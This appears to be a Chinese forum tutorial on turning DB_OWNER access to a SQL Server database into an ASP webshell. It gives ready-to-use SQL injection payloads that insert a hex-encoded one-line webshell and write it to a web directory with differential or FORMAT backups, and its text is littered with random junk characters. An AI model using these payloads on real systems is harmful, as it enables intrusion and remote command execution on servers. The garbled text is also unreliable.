DB_OWNER权限得到webshell的两点改进:
! @' c# \$ ^8 L3 o! q- x. ]+ e5 U4 Z0 V2 O3 ]: d
减少备份文件大小,得到可执行的webshell成功率提高不少
2 V9 Q' m5 u8 z, V _! G一利用差异备份3 L8 j5 q: ^1 I* v
加一个参数WITH DIFFERENTIAL
/ g0 ~% U% x% a* `! U5 j+ ~/ Y% L, H. [+ m
10 V1 ^$ N+ ]! K- E: b
2. h' l5 U4 o, e
3
+ I* O% E, A4 _$ L2 R4 p42 M5 D6 Z1 ~& m2 E8 z: n' E8 g
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
# A: J! E6 }6 U8 K5 B9 Vcreate table [dbo].[xiaolu] ([cmd] [image]);/ {; c, h6 M% Y* \
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
0 h( W. P8 g2 e) k" }; y8 Rdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL ! U' S) f& v/ E) O- k. [
, w4 ?) q' A; `0 K; A$ S' Q二利用完全FORMAT [. ?4 x+ g. u: M- w$ q$ \
加一个参数WITH FROMAT9 i% ]3 H1 x/ C2 Y
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以" o8 \$ N) {& z# G9 c
$ a! T+ a8 x7 O/ D
1
d$ A. W+ N9 |, H6 e* `/ K t4 W2
2 y3 F q" ~2 H3 f4 k( I0 r9 [3
9 T( J& j" Y n1 ~4
, T( x% e! o3 h' u5 u6 q declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s: T% g1 R, n) d3 Q; |: k' C
create table [dbo].[xiaolu] ([cmd] [image]);; @) f# a+ U# ^2 ?% W: e
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
1 U8 o: n% [2 {7 C( {6 a+ `' I" Ddeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT 8 q! A! {" N" |, O! p- H n
1 ~& T/ i5 G) t( n; \, Q! p总的来说就是那么简单几句,下面以备份数据库model为例子
0 a4 d% h' p5 W5 e+ |- o3 d5 u1
" j( Y' d q! V& e& _# v7 k: G3 x) T, ^$ j% N6 ]$ K
1- J m7 P: T- L4 Q
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>') & u( K4 A# S2 a0 `' }, r' V) H
/ d% f4 r9 L- t# _! ?) _& [' P
2. {' _9 ]' O9 b% v% d9 W
/ F2 u7 @/ D; u
1
5 d6 E' `% @( z: l2 Q& p id=1;backup database model to disk='你的路径‘ with differential,format;--
: m5 k, [/ r; b* \# q |